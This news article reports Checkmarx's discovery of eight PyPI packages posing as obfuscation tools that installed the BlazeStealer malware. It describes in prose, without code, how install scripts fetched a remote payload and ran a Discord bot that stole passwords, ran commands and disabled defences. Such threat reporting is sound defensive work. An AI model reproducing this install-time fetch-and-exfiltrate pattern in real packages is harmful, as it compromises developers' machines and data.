Checkmarx analysts discovered in the Python Package Index (PyPI), a new batch of malicious packages containing the BlazeStealer malware, which gave attackers complete control over the victim’s computer.
All malicious packages were disguised as seemingly harmless obfuscation tools. In total, this campaign, which began back in January 2023, included eight packages: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse and pyobfgood, the last of which was published in October.
Advertisement
“It is logical to assume that developers engaged in code obfuscation are most likely dealing with valuable and confidential information, which means that for hackers they are targets worth attacking,” experts note.
The majority of downloads for the packages listed came from the US, followed by China, Russia, Ireland, Hong Kong, Croatia, France and Spain. They have been downloaded a total of 2438 times and have now been removed from PyPI.
All of these libraries contained the BlazeStealer malware and setup.py and init.py files, which were intended to load a malicious Python script hosted on Transfer(.)sh, which was launched immediately after installation. As a result, a Discord bot was launched on the victim’s machine, giving the attackers complete control over the victim’s system.
This bot allowed it to collect a wide range of information about the infected host, including browser passwords and screenshots, execute arbitrary commands, encrypt files, and disable Microsoft Defender. All collected data was transferred to the Discord channel, leaving virtually no traces of presence in the system.
In addition, the bot is capable of making the computer unusable by increasing CPU load, introducing a batch script to turn off the computer into startup and causing a “blue screen of death” (BSoD). All this is accompanied by mocking messages from hackers.
Advertisement
“The open-source space remains fertile ground for innovation, but requires caution. Developers must remain vigilant and check packages before using them,” the experts summarize.